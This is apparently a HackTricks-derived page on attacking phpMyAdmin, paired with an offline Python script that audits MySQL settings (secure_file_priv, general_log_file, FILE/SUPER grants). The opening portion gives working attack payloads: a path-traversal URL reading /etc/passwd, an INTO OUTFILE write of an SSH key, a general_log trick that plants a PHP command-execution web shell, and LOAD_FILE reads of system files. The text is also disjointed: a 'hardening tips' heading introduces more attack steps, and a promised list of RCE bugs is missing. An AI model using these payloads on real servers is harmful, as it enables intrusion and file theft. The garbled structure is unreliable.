phpMyAdmin HackTricks (2024)

Example:

http://example.com/phpmyadmin/libraries/tcpdf/tcpdf.php?tcpdf_import=../../../../etc/passwd

If you can write to /root/.ssh/ or user's home:

SELECT "ssh-rsa AAAAB3..." INTO OUTFILE '/home/user/.ssh/authorized_keys'

If secure_file_priv is set (it limits INTO OUTFILE and LOAD_FILE() to one directory, or disables them entirely when NULL), use the general log method instead:

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT '<?php system($_GET["cmd"]); ?>';
SET GLOBAL general_log = 'OFF';

Once logged in, the real fun begins.

For blue teams / system administrators, HackTricks would conclude with these hardening tips:

If the database contains file paths (e.g., a user_uploads table), insert malicious files into those paths. Or use LOAD_FILE() to read local files:

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('C:/windows/win.ini');

phpMyAdmin is a powerful tool but can become an easy attack vector when exposed, misconfigured, or unpatched. Combining network restrictions, least-privilege database design, strong authentication, diligent patching, and continuous monitoring significantly reduces risk. Administrators should treat phpMyAdmin as a high-risk administration interface and apply defense-in-depth controls accordingly.

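The defensive counterpart of the tricks above is an audit of the server settings they depend on: secure_file_priv (empty means INTO OUTFILE and LOAD_FILE() are unrestricted), general_log / general_log_file (a log file under the web root is a web shell in waiting), and accounts holding FILE, SUPER or SYSTEM_VARIABLES_ADMIN, which are needed for file export and for SET GLOBAL. The script below is an added example, not HackTricks content and not part of phpMyAdmin; it works on the text of SHOW VARIABLES and SHOW GRANTS output, the sample inputs are constructed, and the WEB_ROOTS list is an assumption to adjust per host.

```python
"""Audit MySQL/MariaDB settings behind the post-auth phpMyAdmin tricks:
an unrestricted secure_file_priv, general_log pointed into the web root,
and non-admin accounts holding FILE / SUPER. Runs offline on captured output."""
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (severity, message)

# Constructed sample of `SHOW VARIABLES` output, deliberately in a bad state.
SAMPLE_VARIABLES: Dict[str, str] = {
    "secure_file_priv": "",                       # empty string = no restriction
    "general_log": "ON",
    "general_log_file": "/var/www/html/shell.php",
    "datadir": "/var/lib/mysql/",
}

# Constructed sample of `SHOW GRANTS` output for a web application account.
SAMPLE_GRANTS: List[str] = [
    "GRANT FILE, SELECT, INSERT ON *.* TO 'app'@'localhost'",
    "GRANT ALL PRIVILEGES ON `appdb`.* TO 'app'@'localhost'",
]

# Assumption: directories the web server serves from; adjust per host.
WEB_ROOTS = ("/var/www/", "/srv/http/", "/usr/share/nginx/", "c:/xampp/htdocs/")

# Global privileges that permit SET GLOBAL (SUPER, or SYSTEM_VARIABLES_ADMIN in
# MySQL 8.0) or server-side file access (FILE). ALL PRIVILEGES ON *.* includes them.
DANGEROUS_PRIVS = {"FILE", "SUPER", "SYSTEM_VARIABLES_ADMIN"}

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<who>\S+)", re.I
)


def under_web_root(path: str, web_roots=WEB_ROOTS) -> bool:
    """True if path lies inside a directory the web server would serve."""
    normalised = path.replace("\\", "/").lower()
    return any(normalised.startswith(root) for root in web_roots)


def audit_variables(variables: Dict[str, str], web_roots=WEB_ROOTS) -> List[Finding]:
    findings: List[Finding] = []
    sfp = variables.get("secure_file_priv")
    if sfp is None:
        findings.append(("MEDIUM", "secure_file_priv not reported; confirm it is NULL or a dedicated directory"))
    elif sfp == "":
        findings.append(("HIGH", "secure_file_priv is empty: INTO OUTFILE and LOAD_FILE() may use any path mysqld can reach"))
    elif sfp.upper() != "NULL" and under_web_root(sfp, web_roots):
        findings.append(("HIGH", f"secure_file_priv ({sfp}) is inside a web root, so exported files are web-reachable"))
    # NULL disables server-side file import/export entirely: nothing to report.

    log_on = variables.get("general_log", "OFF").upper() == "ON"
    log_file = variables.get("general_log_file", "")
    if log_file and under_web_root(log_file, web_roots):
        severity = "CRITICAL" if log_on else "HIGH"
        state = "ON" if log_on else "OFF"
        findings.append((severity, f"general_log_file is {log_file}, a web-served path (general_log is {state})"))
    elif log_on:
        findings.append(("LOW", "general_log is ON: every statement, credentials included, is written in clear text"))
    return findings


def audit_grants(grants: List[str], admin_accounts=("'root'@'localhost'",)) -> List[Finding]:
    findings: List[Finding] = []
    for line in grants:
        match = GRANT_RE.match(line.strip())
        if not match:
            continue
        who, scope = match.group("who"), match.group("scope")
        if who in admin_accounts:
            continue
        privs = {p.strip().upper() for p in match.group("privs").split(",")}
        held = privs & DANGEROUS_PRIVS
        if "ALL PRIVILEGES" in privs and scope == "*.*":
            held = {"ALL PRIVILEGES"}
        if held:
            findings.append(("HIGH", f"{who} holds {', '.join(sorted(held))} ON {scope}; "
                                     "file export and SET GLOBAL general_log are possible"))
    return findings


def run_audit(variables=SAMPLE_VARIABLES, grants=SAMPLE_GRANTS) -> List[Finding]:
    return audit_variables(variables) + audit_grants(grants)


if __name__ == "__main__":
    for severity, message in run_audit():
        print(f"[{severity}] {message}")
```

Feed it the real output of SHOW VARIABLES LIKE 'secure_file_priv', SHOW VARIABLES LIKE 'general_log%' and SHOW GRANTS for each account phpMyAdmin can log in as; a clean result is secure_file_priv = NULL (or a directory outside every web root), general_log_file under /var/log, and no application account holding FILE, SUPER or ALL PRIVILEGES ON *.*.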

HackTricks reminds us that even without credentials, phpMyAdmin itself has had nasty RCE bugs:

These show that keeping phpMyAdmin fully patched matters, but an exposed, unpatched instance is a disaster waiting to happen.